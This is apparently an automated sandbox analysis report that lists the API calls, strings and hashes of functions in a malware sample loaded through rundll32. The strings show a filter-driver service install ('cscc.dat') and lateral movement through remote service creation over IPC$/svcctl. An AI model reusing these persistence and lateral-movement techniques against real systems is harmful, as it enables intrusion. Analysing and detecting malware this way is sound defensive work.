                                                                      • Opcode ID: bb3568813610797e8323b4915ac9002a3e8e49b3b015c768a3cfea773b6582a2
                                                                      • Instruction ID: 75e20f53d4d0d12f835640e1d95d0574c4faeef2e79160030a9af38ccfe5906c
                                                                      • Opcode Fuzzy Hash: bb3568813610797e8323b4915ac9002a3e8e49b3b015c768a3cfea773b6582a2
                                                                      • Instruction Fuzzy Hash: 84E1AE75500305EFEB109FA8D885B9A7BF8FF48710F108999EE04DB291E7B9E840CB55
                                                                      Function 04853D0D Relevance: 39.3, APIs: 26, Instructions: 326memorysleepnetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74DEF380,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?), ref: 04853D2B
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D34
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04853D46
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D49
                                                                      • GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853D63
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D66
                                                                      • Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04854269,?,00000000,?,?,?), ref: 04853E5B
                                                                      • GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853E65
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853E68
                                                                      • rand.MSVCRT ref: 04853EC3
                                                                      • memset.MSVCRT ref: 04853EFC
                                                                        • Part of subcall function 04853209: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E), ref: 04853220
                                                                        • Part of subcall function 04853209: HeapAlloc.KERNEL32(00000000,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?), ref: 04853227
                                                                        • Part of subcall function 04853209: htons.WS2_32(?), ref: 04853246
                                                                        • Part of subcall function 04853209: memcpy.MSVCRT(0000004B,?,?,?,04853BAA,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?), ref: 04853276
                                                                        • Part of subcall function 04853209: send.WS2_32(?,00000000,?,00000000), ref: 04853287
                                                                        • Part of subcall function 04853209: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0485329A
                                                                        • Part of subcall function 04853209: HeapFree.KERNEL32(00000000), ref: 048532A1
                                                                      • recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04853F38
                                                                      • htons.WS2_32(?), ref: 04853F5C
                                                                      • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04853FF8
                                                                      • Sleep.KERNEL32(000007D0,00000000,00000000,?,00000000,00000000,?), ref: 04854063
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 0485406E
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854075
                                                                      • memcpy.MSVCRT(00000000,?,?), ref: 0485408F
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,?,?,?,?,04854269,?,00000000,?,?), ref: 048540A0
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540A7
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04854269,?,00000000,?,?), ref: 048540B6
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540B9
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 048540C2
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540C5
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 048540D0
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 048540D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$Sleep$htonsmemcpy$memsetrandrecvsend
                                                                      • String ID:
                                                                      • API String ID: 2208892845-0
                                                                      • Opcode ID: 51a001dadee8562b945d2c2589a1187564fceca54979811e1a2369d3c2f30df8
                                                                      • Instruction ID: 19856749d77a5ca577c716873a8ee32d0b04fd229089733fa0a4bc233d056125
                                                                      • Opcode Fuzzy Hash: 51a001dadee8562b945d2c2589a1187564fceca54979811e1a2369d3c2f30df8
                                                                      • Instruction Fuzzy Hash: 4FD16BB0100300AFD750DF69C884B6ABBE5FF48304F148999FD89DB2A2E779E845CB65
                                                                      Function 04852497 Relevance: 39.2, APIs: 26, Instructions: 199memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524AF
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524B8
                                                                      • GetProcessHeap.KERNEL32(00000008,00001124,74DEF380,?,?,?,0485471C,?,?,?,?,?), ref: 048524CD
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524D0
                                                                      • rand.MSVCRT ref: 048524E1
                                                                      • htons.WS2_32(00001120), ref: 048524FF
                                                                      • rand.MSVCRT ref: 0485255F
                                                                      • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0485471C,?,?,?,?,?), ref: 04852576
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 0485257D
                                                                      • htons.WS2_32(0000015C), ref: 0485259F
                                                                      • rand.MSVCRT ref: 048525CD
                                                                      • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,0485471C,?,?,?,?,?), ref: 048525E4
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048525EB
                                                                      • memcpy.MSVCRT(00000000,00000000,00001124,?,?,?,0485471C,?,?,?,?,?), ref: 04852605
                                                                      • memcpy.MSVCRT(00001124,?,00000160,00000000,00000000,00001124,?,?,?,0485471C,?,?,?,?,?), ref: 04852617
                                                                      • send.WS2_32(?,00000000,0000111C,00000000), ref: 04852630
                                                                      • send.WS2_32(?,?,00000168,00000000), ref: 0485264D
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04852697
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526BF
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526C6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526CF
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526D6
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526DF
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526E6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,0485471C,?,?,?,?,?), ref: 048526F1
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048526F8
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$rand$htonsmemcpysend$recv
                                                                      • String ID:
                                                                      • API String ID: 3700823678-0
                                                                      • Opcode ID: 5a074e68ef88c5ee083f4d140e47f0c05cccc69010e28c32c4fde50ec78bc6a4
                                                                      • Instruction ID: 697de120f306472af7aa62592c744fd1bfc73b5e6ec7d4b05694f6e1541b8b4c
                                                                      • Opcode Fuzzy Hash: 5a074e68ef88c5ee083f4d140e47f0c05cccc69010e28c32c4fde50ec78bc6a4
                                                                      • Instruction Fuzzy Hash: 6B71C475500346AFEB149FA8DC49B9A7BA8FF48700F048599FE04DF295DBB8E840CB65
                                                                      Function 048513E8 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 118registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04851408
                                                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 04851427
                                                                      • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 04851453
                                                                      • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 0485147E
                                                                      • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04851495
                                                                      • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 048514B3
                                                                      • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 048514CB
                                                                      • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 048514E9
                                                                      • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 04851501
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 04851523
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseOpenQuerywsprintf
                                                                      • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
                                                                      • API String ID: 693892761-175094307
                                                                      • Opcode ID: d2e08028088a2c4d29e617d33c82749262a94dc65a47705b7a05fe61fbd893bf
                                                                      • Instruction ID: fa793ef329e5959390fdbe5b0e6738d9d1b95ba12fbc50f31036b35cc0114a9f
                                                                      • Opcode Fuzzy Hash: d2e08028088a2c4d29e617d33c82749262a94dc65a47705b7a05fe61fbd893bf
                                                                      • Instruction Fuzzy Hash: 5D319EB1E4020CBBEB519E918C49FAF7BBCEF05B44F100955BA02E1250E2B4AF009E65
                                                                      Function 0485516B Relevance: 31.7, APIs: 17, Strings: 4, Instructions: 172memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 04851EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 04851ED2
                                                                        • Part of subcall function 04851EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851EDB
                                                                        • Part of subcall function 04851EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0485943A), ref: 04851F1F
                                                                        • Part of subcall function 04851EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851F22
                                                                        • Part of subcall function 04851EB9: htons.WS2_32(?), ref: 04851F41
                                                                        • Part of subcall function 04852054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 0485206D
                                                                        • Part of subcall function 04852054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852076
                                                                        • Part of subcall function 04852054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0485943A), ref: 0485209C
                                                                        • Part of subcall function 04852054: HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485209F
                                                                        • Part of subcall function 04852054: htons.WS2_32(?), ref: 048520BC
                                                                        • Part of subcall function 04852054: send.WS2_32(?,00000000,?,00000000), ref: 04852131
                                                                        • Part of subcall function 04852054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04852148
                                                                        • Part of subcall function 04852054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A), ref: 04852168
                                                                        • Part of subcall function 04852054: HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485216F
                                                                        • Part of subcall function 04854E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04854E76
                                                                        • Part of subcall function 04854E60: HeapAlloc.KERNEL32(00000000), ref: 04854E79
                                                                        • Part of subcall function 04854E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04854F2A
                                                                        • Part of subcall function 04854E60: HeapFree.KERNEL32(00000000), ref: 04854F2D
                                                                        • Part of subcall function 04854E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04854F32
                                                                        • Part of subcall function 04854E60: HeapFree.KERNEL32(00000000), ref: 04854F35
                                                                      • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 048551D3
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048551DC
                                                                        • Part of subcall function 04854F43: GetProcessHeap.KERNEL32(00000008,00000068,74DEF380,?,76ED5E70,?,048551F9,?,?,?), ref: 04854F56
                                                                        • Part of subcall function 04854F43: HeapAlloc.KERNEL32(00000000,?,048551F9,?,?,?), ref: 04854F5D
                                                                        • Part of subcall function 04854F43: rand.MSVCRT ref: 04854F86
                                                                        • Part of subcall function 04854F43: GetProcessHeap.KERNEL32(00000008,?,048551F9,?,00000000,?,048551F9,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04854FF7
                                                                        • Part of subcall function 04854F43: HeapFree.KERNEL32(00000000), ref: 04854FFE
                                                                        • Part of subcall function 04854F43: GetProcessHeap.KERNEL32(00000008,00000000,048551F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,048551F9,?,?,?), ref: 04855007
                                                                        • Part of subcall function 04854F43: HeapFree.KERNEL32(00000000,?,048551F9,?,?,?), ref: 0485500E
                                                                      • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04855205
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04855208
                                                                      • rand.MSVCRT ref: 0485521B
                                                                      • rand.MSVCRT ref: 04855226
                                                                      • rand.MSVCRT ref: 0485522F
                                                                      • sprintf.MSVCRT ref: 04855246
                                                                      • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855252
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855255
                                                                      • sprintf.MSVCRT ref: 048552AB
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 04855308
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485530B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855316
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0485943A), ref: 04855319
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 04855324
                                                                      • HeapFree.KERNEL32(00000000), ref: 04855327
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$rand$htonssprintf$recvsend
                                                                      • String ID: IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                                                      • API String ID: 1576125627-3210642070
                                                                      • Opcode ID: 95b4ce13214066247afbb9b521dd32b390269a8286a9978a66901865081e4b1d
                                                                      • Instruction ID: 96bea9bcac80865b82349e0da62a9f1ff281bb1ab043240aa6d3912ae07f8e44
                                                                      • Opcode Fuzzy Hash: 95b4ce13214066247afbb9b521dd32b390269a8286a9978a66901865081e4b1d
                                                                      • Instruction Fuzzy Hash: DD51CD72900209BBDF01EFA8DC44FEE7BA9EF49304F044944FE45A6161CBB5E919CB61
                                                                      Function 048521DC Relevance: 28.6, APIs: 19, Instructions: 129memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,74DEF380,?,?,?,?,?,?,?,?), ref: 048521F5
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048521FE
                                                                      • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 04852210
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852213
                                                                      • htons.WS2_32(00000029), ref: 0485222E
                                                                      • send.WS2_32(?,?,0000002D,00000000), ref: 04852255
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04852271
                                                                      • memset.MSVCRT ref: 04852297
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027), ref: 048522A3
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048522A6
                                                                      • htons.WS2_32(00000023), ref: 048522C1
                                                                      • send.WS2_32(?,?,00000027,00000000), ref: 048522DA
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 048522F2
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852314
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852317
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852323
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852326
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 04852331
                                                                      • HeapFree.KERNEL32(00000000), ref: 04852334
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                                                      • String ID:
                                                                      • API String ID: 821554539-0
                                                                      • Opcode ID: f013cb9e48f1324f075ae22c1b92ad08267f49f1a0d4ed984db1db9f01e55ebb
                                                                      • Instruction ID: a70bed4a6d18db709e67c3755b662f8a1548d24f4dd150f8ddce073dfbb96fb9
                                                                      • Opcode Fuzzy Hash: f013cb9e48f1324f075ae22c1b92ad08267f49f1a0d4ed984db1db9f01e55ebb
                                                                      • Instruction Fuzzy Hash: 51417131640305BFEB109FA9DC49F9E7BA8EF49750F008895FD45DB2A0EA78E944CB51
                                                                      Function 048585FB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 147processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0485862D
                                                                        • Part of subcall function 04858147: memset.MSVCRT ref: 04858160
                                                                        • Part of subcall function 04858147: GetVersionExW.KERNEL32(?,?,?,74DF0F10), ref: 04858179
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04858645
                                                                      • Process32FirstW.KERNEL32 ref: 04858666
                                                                      • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 048586A0
                                                                      • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 048586B9
                                                                      • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 048586DF
                                                                      • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 04858708
                                                                      • memset.MSVCRT ref: 0485871E
                                                                      • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 04858738
                                                                      • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 04858767
                                                                      • CloseHandle.KERNEL32(?), ref: 048587A2
                                                                      • CloseHandle.KERNEL32(?), ref: 048587A8
                                                                      • Process32NextW.KERNEL32(?,?), ref: 048587BA
                                                                      • GetLastError.KERNEL32 ref: 048587CA
                                                                      • CloseHandle.KERNEL32(?), ref: 048587D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                                      • String ID: @
                                                                      • API String ID: 4137997400-2766056989
                                                                      • Opcode ID: 00a255e060883f9744aa42fba2ed6942a8ca052b44a3bfcab2fdc15fa2cd0367
                                                                      • Instruction ID: 655762bb1f24430bbde42378ced3513b120a3e51fca7f188d4a635082f676296
                                                                      • Opcode Fuzzy Hash: 00a255e060883f9744aa42fba2ed6942a8ca052b44a3bfcab2fdc15fa2cd0367
                                                                      • Instruction Fuzzy Hash: B0514771608301AFE720AF25D849A6FBBECFB88754F444E2EF994D21A0D734E915CB52
                                                                      Function 048546C7 Relevance: 25.3, APIs: 20, Instructions: 333memorysleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 048546E4
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048546E7
                                                                        • Part of subcall function 04852497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524AF
                                                                        • Part of subcall function 04852497: HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524B8
                                                                        • Part of subcall function 04852497: GetProcessHeap.KERNEL32(00000008,00001124,74DEF380,?,?,?,0485471C,?,?,?,?,?), ref: 048524CD
                                                                        • Part of subcall function 04852497: HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524D0
                                                                        • Part of subcall function 04852497: rand.MSVCRT ref: 048524E1
                                                                        • Part of subcall function 04852497: htons.WS2_32(00001120), ref: 048524FF
                                                                        • Part of subcall function 04852497: rand.MSVCRT ref: 0485255F
                                                                        • Part of subcall function 04852497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0485471C,?,?,?,?,?), ref: 04852576
                                                                        • Part of subcall function 04852497: HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 0485257D
                                                                        • Part of subcall function 04852497: htons.WS2_32(0000015C), ref: 0485259F
                                                                        • Part of subcall function 04852497: rand.MSVCRT ref: 048525CD
                                                                      • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0485478F
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 048547B4
                                                                      • HeapFree.KERNEL32(00000000), ref: 048547B7
                                                                      • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 048547F0
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048547F9
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04854810
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854813
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 04854875
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854878
                                                                      • Sleep.KERNEL32(000007D0), ref: 0485488D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000029), ref: 04854897
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485489A
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 04854911
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854914
                                                                      • GetProcessHeap.KERNEL32(00000008,00000013), ref: 048549D2
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04852E32
                                                                        • Part of subcall function 04852E12: HeapAlloc.KERNEL32(00000000), ref: 04852E3B
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,00000048,74DEF380), ref: 04852E4D
                                                                        • Part of subcall function 04852E12: HeapAlloc.KERNEL32(00000000), ref: 04852E50
                                                                        • Part of subcall function 04852E12: htons.WS2_32(00000044), ref: 04852E68
                                                                        • Part of subcall function 04852E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04852EF3
                                                                        • Part of subcall function 04852E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04852F0B
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04852F31
                                                                        • Part of subcall function 04852E12: HeapFree.KERNEL32(00000000), ref: 04852F38
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,?), ref: 04852F43
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048549D5
                                                                        • Part of subcall function 04853680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74DEF380,?,?,04854A6E,?,?,?,?,00000000,?), ref: 04853698
                                                                        • Part of subcall function 04853680: HeapAlloc.KERNEL32(00000000,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536A1
                                                                        • Part of subcall function 04853680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536B1
                                                                        • Part of subcall function 04853680: HeapAlloc.KERNEL32(00000000,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536B4
                                                                        • Part of subcall function 04853680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536C7
